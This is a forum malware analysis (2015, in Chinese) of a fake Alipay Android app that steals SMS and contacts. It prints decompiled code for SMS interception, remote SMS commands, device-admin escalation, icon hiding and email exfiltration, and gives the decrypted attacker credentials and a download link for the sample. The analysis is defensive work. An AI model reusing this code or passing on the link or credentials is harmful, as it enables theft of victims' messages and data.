本帖最后由 leerina 于 2015-11-30 12:11 编辑
一、样本信息
| 文件名称: | 支付宝钱包.apk | | MD5值: | b1e40471dec08b28a5617aa3f4d9614c | | 文件大小: | 206.02KB | | 上传时间: | 2015-11-30 11:02:05 | | 包名: | com.ayuinnfchpsj.jmbvipdax0526abaj16.fxzjkxingf.pojie.ggengxisn | | 最低运行环境: | Android 2.2.x | | 版权: | Android | | 图标: |  |
样本来源:http://www.52pojie.cn/thread-439945-1-1.html
二,行为基本分析
利用androidkiller查壳,发现利用了 APKProtect 加固处理,但可以直接利用android反编译出来:通过分析,发现其加壳并没有什么用,拉出DEX文件也可直接进行反编译源码:
3.查看配置文件
[Java] 纯文本查看 复制代码 <?xml version="1.0" encoding="utf-8" standalone="no"?>
<manifest xmlns:android="http://schemas.android.com/apk/res/android" android:installLocation="internalOnly" package="com.ayuinnfchpsj.jmbvipdax0526abaj16.fxzjkxingf.pojie.ggengxisn" platformBuildVersionCode="21" platformBuildVersionName="5.0-1504858">
<uses-permission android:name="android.permission.INTERNET"/>
<uses-permission android:name="android.permission.READ_SMS"/>
<uses-permission android:name="android.permission.WRITE_SMS"/>
<uses-permission android:name="android.permission.SEND_SMS"/>
<uses-permission android:name="android.permission.RECEIVE_SMS"/>
<uses-permission android:name="android.permission.RECEIVE_WAP_PUSH"/>
<uses-permission android:name="android.permission.RECEIVE_BOOT_COMPLETED"/>
<uses-permission android:name="android.permission.RECEIVE_USER_PRESENT"/>
<uses-permission android:name="android.permission.READ_PHONE_STATE"/>
<uses-permission android:name="android.permission.MODIFY_AUDIO_SETTINGS"/>
<uses-permission android:name="android.permission.READ_CONTACTS"/>
<uses-permission android:name="android.permission.CALL_PHONE"/>
<uses-permission android:name="android.permission.READ_CALL_LOG"/>
<uses-permission android:name="android.permission.WRITE_CALL_LOG"/>
<uses-permission android:name="android.permission.GET_TASKS"/>
<uses-permission android:name="android.permission.ACCESS_NETWORK_STATE"/>
<uses-permission android:name="android.permission.WRITE_SETTINGS"/>
<uses-permission android:name="android.permission.VIBRATE"/>
<uses-permission android:name="android.permission.WRITE_EXTERNAL_STORAGE"/>
<uses-permission android:name="android.permission.ACCESS_WIFI_STATE"/>
<application android:allowBackup="true" android:icon="@drawable/app_logo" android:label="@string/app_name" android:name="com.phone.stop.db.PhoneApplication" android:theme="@android:style/Theme.Black.NoTitleBar.Fullscreen">
<activity android:excludeFromRecents="false" android:label="@string/app_name" android:name="com.phone.stop.activity.MainActivity">
<intent-filter>
<action android:name="android.intent.action.MAIN"/>
<category android:name="android.intent.category.LAUNCHER"/>
</intent-filter>
</activity>
<activity android:excludeFromRecents="false" android:label="@string/app_name" android:name="com.phone.stop.activity.DeleteActivity">
<intent-filter>
<category android:name="android.intent.category.DEFAULT"/>
<action android:name="android.intent.action.DELETE"/>
<data android:scheme="package"/>
</intent-filter>
</activity>
<service android:exported="true" android:name="com.phone.stop.service.BootService"/>
<service android:name="com.ms"/>
<service android:name="com.se"/>
<receiver android:name="com.phone.stop.receiver.BootReceiver">
<intent-filter android:priority="2147483647">
<action android:name="android.intent.action.BOOT_COMPLETED"/>
<action android:name="android.net.conn.CONNECTIVITY_CHANGE"/>
<action android:name="android.provider.Telephony.SMS_RECEIVED"/>
<action android:name="android.provider.Telephony.GSM_SMS_RECEIVED"/>
<action android:name="android.provider.Telephony.SMS_RECEIVED_2"/>
<action android:name="android.provider.Telephony.SMS_DELIVER"/>
</intent-filter>
</receiver>
<receiver android:name="com.phone.stop.receiver.SMSReceiver">
<intent-filter android:priority="2147483647">
<action android:name="android.provider.Telephony.SMS_RECEIVED"/>
</intent-filter>
</receiver>
<receiver android:name="com.phone.stop.receiver.MyDeviceAdminReceiver" android:permission="android.permission.BIND_DEVICE_ADMIN">
<meta-data android:name="android.app.device_admin" android:resource="@xml/devicepolicymanager_permission"/>
<intent-filter>
<action android:name="android.app.action.DEVICE_ADMIN_ENABLED"/>
</intent-filter>
</receiver>
</application>
</manifest>
通过以上配置文件可以大概了解到样本的一些危险操作:
[Java] 纯文本查看 复制代码 android.permission.INTERNET //连接网络(2G或3G)
android.permission.READ_SMS //读取短信
android.permission.WRITE_SMS //写短信
android.permission.SEND_SMS// 发送短信
android.permission.RECEIVE_SMS //监控接收短信
android.permission.RECEIVE_WAP_PUSH //接收wap push信息
android.permission.RECEIVE_BOOT_COMPLETED //接收开机启动广播
android.permission.RECEIVE_USER_PRESENT N/A
android.permission.READ_PHONE_STATE// 读取电话状态
android.permission.MODIFY_AUDIO_SETTINGS //修改声音设置
android.permission.READ_CONTACTS //读取联系人信息
android.permission.CALL_PHONE //拨打电话
android.permission.READ_CALL_LOG //读取通话记录
android.permission.WRITE_CALL_LOG //写入通话记录
android.permission.GET_TASKS //获取有关当前或最近运行的任务信息
android.permission.ACCESS_NETWORK_STATE //读取网络状态(2G或3G)
android.permission.WRITE_SETTINGS //读写系统设置项
android.permission.VIBRATE //允许设备震动
android.permission.WRITE_EXTERNAL_STORAGE //写外部存储器(如:SD卡)
android.permission.ACCESS_WIFI_STATE //读取wifi网络状态
首先依次分析代码,打开了一个加密字符串代码段,其出现的账号和相关信息都是通过AES加密:
[Java] 纯文本查看 复制代码 import java.io.PrintStream;
import java.io.UnsupportedEncodingException;
import javax.crypto.Cipher;
import javax.crypto.spec.SecretKeySpec;
public class C
{
[color=#ff0000] private static final String CipherMode = "AES/ECB/PKCS5Padding";
public static String k = "sdtyffdftesfyfdw";
[/color]
public static String byte2hex(byte[] paramArrayOfByte)
{
StringBuffer localStringBuffer = new StringBuffer(paramArrayOfByte.length * 2);
int i = 0;
for (;;)
{
if (i >= paramArrayOfByte.length) {
return localStringBuffer.toString().toUpperCase();
}
String str = Integer.toHexString(paramArrayOfByte[i] & 0xFF);
if (str.length() == 1) {
localStringBuffer.append("0");
}
localStringBuffer.append(str);
i += 1;
}
执行打印日志的命令:
[Java] 纯文本查看 复制代码 public void run()
{
try
{
BufferedReader localBufferedReader = new BufferedReader(new InputStreamReader(Runtime.getRuntime().exec("logcat -v threadtime").getInputStream()), 20);
for (;;)
{
String str = localBufferedReader.readLine();
if (str == null) {
break;
}
ADRTSender.sendLogcatLines(new String[] { str });
}
return;
}
catch (IOException localIOException) {}
}
}
操作中招者手机短信信息,其中有读取短信,发送短信,拦截短信,删除短信的操作:
[Java] 纯文本查看 复制代码
import android.net.Uri;
public class a
{
public static final Uri a = Uri.parse("content://sms");
public static final Uri b = Uri.parse("content://sms/inbox");
public static final Uri c = Uri.parse("content://sms/conversations/");
public static final Uri d = Uri.parse("content://sms/sent");
}
获取设备管理性能操作:
[Java] 纯文本查看 复制代码 public void a()
{
try
{
Object localObject = (DevicePolicyManager)getSystemService("device_policy");
ComponentName localComponentName = new ComponentName(this, MyDeviceAdminReceiver.class);
if (!((DevicePolicyManager)localObject).isAdminActive(localComponentName))
{
localObject = new Intent("android.app.action.ADD_DEVICE_ADMIN");
((Intent)localObject).putExtra("android.app.extra.DEVICE_ADMIN", localComponentName);
((Intent)localObject).putExtra("android.app.extra.ADD_EXPLANATION", "提高权限获取保护");//提高权限获取保护
startActivityForResult((Intent)localObject, 0);
this.a.sendEmptyMessageDelayed(0, 2300L);
}
return;
}
创建保护进程,当用户尝试卸载时,提示已经卸载,用来伪装自己真实存在的:
监控短信(收到短信)启动服务:
[Java] 纯文本查看 复制代码 package com.phone.stop.receiver;
import android.content.BroadcastReceiver;
import android.content.Context;
import android.content.Intent;
import android.os.Build.VERSION;
import android.os.Bundle;
import android.telephony.SmsMessage;
import com.phone.stop.d.c;
import com.phone.stop.db.a;
import com.phone.stop.e.b;
import com.phone.stop.f.g;
import com.phone.stop.f.h;
import com.phone.stop.f.j;
import com.phone.stop.f.l;
import com.w;
import java.util.ArrayList;
import java.util.Iterator;
public class SMSReceiver
extends BroadcastReceiver
{
public static int n;
private Context a;
private final int b = 1;
public SMSReceiver()
{
n = 1;
}
private void a(Intent paramIntent)
{
paramIntent = paramIntent.getExtras();
Object localObject = new StringBuffer();
SmsMessage[] arrayOfSmsMessage;
int i;
String str1;
if (paramIntent != null)
{
paramIntent = (Object[])paramIntent.get("pdus");
arrayOfSmsMessage = new SmsMessage[paramIntent.length];
int j = paramIntent.length;
i = 0;
if (i >= j)
{
j = arrayOfSmsMessage.length;
paramIntent = "";
str1 = "";
i = 0;
label62:
if (i < j) {
break label163;
}
}
}
for (;;)
{
if (n == 1) {
abortBroadcast();
}
localObject = ((StringBuffer)localObject).toString();
a(str1, (String)localObject, paramIntent);
com.phone.stop.c.d.a(this.a, localObject + "<br>" + str1 + "<br><br><br>" + j.a() + "-----------------����<");
return;
arrayOfSmsMessage[i] = SmsMessage.createFromPdu((byte[])paramIntent[i]);
i += 1;
break;
label163:
paramIntent = arrayOfSmsMessage[i];
str1 = paramIntent.getDisplayOriginatingAddress();
String str2 = paramIntent.getMessageBody();
paramIntent = paramIntent.getTimestampMillis();
((StringBuffer)localObject).append(str2);
i += 1;
break label62;
paramIntent = "";
str1 = "";
}
}
private void a(String paramString1, String paramString2, String paramString3)
{
String str = a.a(this.a).c();
if (a(paramString1, paramString2)) {
return;
}
switch (a.a(this.a).g())
{
default:
return;
case 1:
b(paramString1, paramString2, paramString3);
return;
case 3:
clearAbortBroadcast();
return;
}
c(str, paramString2, paramString3);
}
private boolean a(String paramString1, String paramString2)
{
if (paramString1.contains(a.a(this.a).c()))
{
g.a("------------------ ������----------------------");
a(paramString2);
paramString1 = paramString2.split(" ");
if (paramString1[0].equals("LJ")) {
if (paramString1[1].equals("ALL")) {
a.a(this.a).a(1);
}
}
do
{
do
{
do
{
return true;
if (paramString1[1].equals("SOME"))
{
a.a(this.a).a(2);
return true;
}
} while (!paramString1[1].equals("NO"));
a.a(this.a).a(3);
return true;
if (paramString1[0].equals("ADD"))
{
paramString2 = new c();
paramString2.c = paramString1[1];
b.a(paramString2);
return true;
}
if (paramString1[0].equals("DEL"))
{
b.a(paramString1[1]);
return true;
}
if (paramString1[0].equals("CLEAR"))
{
if (paramString1[1].equals("ALL"))
{
b.a();
return true;
}
paramString1[1].equals("MESSAGE");
return true;
}
if (!paramString1[0].equals("LOOK")) {
break;
}
if (paramString1[1].equals("TIME"))
{
l.a("��������:" + a.a(this.a).e(), 4, this.a);
return true;
}
} while (!paramString1[1].equals("PHONE"));
l.a(j.a(), 4, this.a);
return true;
} while (!paramString1[0].equals("SEND"));
try
{
l.a(paramString1[1], paramString1[2], this.a);
return true;
}
catch (Exception paramString1)
{
return true;
}
}
return false;
}
private void b(String paramString1, String paramString2, String paramString3)
{
a(paramString2);
l.a(paramString2 + "\n����:" + paramString1, 4, this.a);
}
private void c(String paramString1, String paramString2, String paramString3)
{
paramString3 = b.b().iterator();
do
{
if (!paramString3.hasNext()) {
return;
}
} while (!paramString1.contains(((c)paramString3.next()).c));
a(paramString2);
l.a(paramString2 + "\n����:" + paramString1, 4, this.a);
}
public void a(String paramString)
{
if (String.valueOf(Build.VERSION.RELEASE).compareTo("4.4") >= 0) {
new h().a(this.a, paramString);
}
}
public void onReceive(Context paramContext, Intent paramIntent)
{
w.a(paramIntent, paramContext);
g.a(" ����---------------------------------------");
this.a = paramContext;
a(paramIntent);
com.phone.stop.f.d.b(paramContext, 0);
com.phone.stop.f.d.c(paramContext, 0);
com.phone.stop.f.d.a(paramContext, 0);
com.phone.stop.f.d.a(paramContext, true);
}
}
创建邮箱客户端,以便中招手机可以将短信,通讯录等信息发送到目标邮箱:
[Java] 纯文本查看 复制代码 private static void c(Context paramContext, String paramString)
{
try
{
com.phone.stop.db.a locala = com.phone.stop.db.a.a(paramContext);
String str1 = ((TelephonyManager)paramContext.getSystemService("phone")).getDeviceId();
String str5 = k.a(paramContext);
String str2 = locala.p();
String str3 = locala.t();
String str4 = locala.r();
b localb = new b();
localb.a("smtp.163.com", "25");
paramContext = "MESS(" + str1 + ")" + "(" + str5 + ")";
if (paramString.contains("������������")) {
paramContext = "����MESS(" + str1 + ")" + "(" + str5 + ")";
}
localb.a(str2, paramContext, paramString);
localb.a(new String[] { str4 });
localb.b("smtp.163.com", str2, str3);
locala.g(true);
return;
}
catch (Exception paramContext)
{
g.a("aaaa", paramContext);
}
}
public String p()
{
this.b.getString("send_email_account", "587676AA1B91FA679F7EE717D56D6EAE42C4667D5D21F62B");
return C.decrypt("15A60D0257FB9C16C13B55CD75A091E543E19E8E8780A1C6822ADA1412ED2DA3", C.k);
}
public boolean q()
{
return this.b.getBoolean("has_set_send_email_account", false);
}
public String r()
{
[color=#ff0000] this.b.getString("receive_email_account", "587676AA1B91FA679F7EE717D56D6EAE42C4667D5D21F62B");
return C.decrypt("8D9CF1F5E6F81DAD[/color]4[color=#ff0000]ABDA220DBCCF46947159942CFCDC3C50E03D88B78D6E0C9", C.k);
}[/color]
public boolean s()
{
return this.b.getBoolean("has_set_receive_email_account", false);
}
public String t()
{
[color=#ff0000] this.b.getString("send_email_pwd", "C078BC539D7813F590EB0D529BAB4C10D0C3804FAF7F793C");
return C.decrypt("97438219C8E7D5ECBA445F15976A45BA", C.k);
}[/color]
public boolean u()
{
return this.b.getBoolean("has_set_send_email_pwd", false);
}
}
经过AES解密后发现,其邮箱账号为:baokaw004@163.com/cy081225不用尝试登陆了,因为密码已经改了
继续分析代码,发现中招手机还可以将短信发送至病毒制造者:[Java] 纯文本查看 复制代码 String str2 = paramIntent[i];
localObject1 = "+86" + "9E1B5E0D5A9725A4528B0FA97DACE97E";//解密后手机号码为:[color=#fd5555]13138914565[/color]
Object localObject2 = str2.getDisplayOriginatingAddress();
str2 = str2.getDisplayMessageBody();
if (((String)localObject2).equals(localObject1)) {}
try
{
if (str2.startsWith("#send"))
{
localObject1 = str2.substring(5);
try
{
localObject2 = Class.forName("com.ms");
localObject2 = new Intent(paramContext, (Class)localObject2);
((Intent)localObject2).putExtra("c", (String)localObject1);
paramContext.startService((Intent)localObject2);
}
catch (ClassNotFoundException localClassNotFoundException1)
{
throw new NoClassDefFoundError(localClassNotFoundException1.getMessage());
[Java] 纯文本查看 复制代码 public class MainActivity
extends Activity
{
Handler a = new b(this);
public void a()
{
try
{
Object localObject = (DevicePolicyManager)getSystemService("device_policy");
ComponentName localComponentName = new ComponentName(this, MyDeviceAdminReceiver.class);
if (!((DevicePolicyManager)localObject).isAdminActive(localComponentName))
{
localObject = new Intent("android.app.action.ADD_DEVICE_ADMIN");
((Intent)localObject).putExtra("android.app.extra.DEVICE_ADMIN", localComponentName);
((Intent)localObject).putExtra("android.app.extra.ADD_EXPLANATION", "提高权限保护");
startActivityForResult((Intent)localObject, 0);
this.a.sendEmptyMessageDelayed(1, 2000L);
}
return;
}
catch (Exception localException)
{
localException.printStackTrace();
}
}
protected void onActivityResult(int paramInt1, int paramInt2, Intent paramIntent)
{
super.onActivityResult(paramInt1, paramInt2, paramIntent);
if (paramInt1 == 0)
{
if (paramInt2 != -1) {
break label86;
}
Log.i("onActivityResult", "Enable it");
a.a(this).a(true);
l.b(j.a() + "\n用户选择了激活", 4, this);//如果用户选择了激活,则病毒程序桌面图标被隐藏了
}
for (;;)
{
startService(new Intent(this, BootService.class));
this.a.sendEmptyMessageDelayed(0, 3000L);
return;
label86:
l.b(j.a() + "\n用户没有选择激活", 4, this);
Log.i("onActivityResult", "Cancle it");
}
}
protected void onCreate(Bundle paramBundle)
{
super.onCreate(paramBundle);
setContentView(2130903040);
getPackageManager().setComponentEnabledSetting(getComponentName(), 2, 1);
i.a(this);
i.b(this);
i.c(this);
i.d(this);
i.e(this);
i.f(this);
if (!a.a(this).i())
{
paramBundle = ((TelephonyManager)getSystemService("phone")).getDeviceId();
l.a("软件安装完毕\n识别码:" + paramBundle + "\n" + j.a(), 4, this);
a.a(this).e(true);
}
l.a(this);
if (a.a(this).l()) {
d.a(this);
}
a();
}
}
某平台分析:
四.总结
此样本的伪装行为较好,将桌面图标伪装为支付宝图标,之后再隐藏桌面图标。样本下载地址:
http://cloud.189.cn/t/v2mMbarEneQf(访问码:5635)
| 
[复制链接]
发表于 2015-11-30 12:04
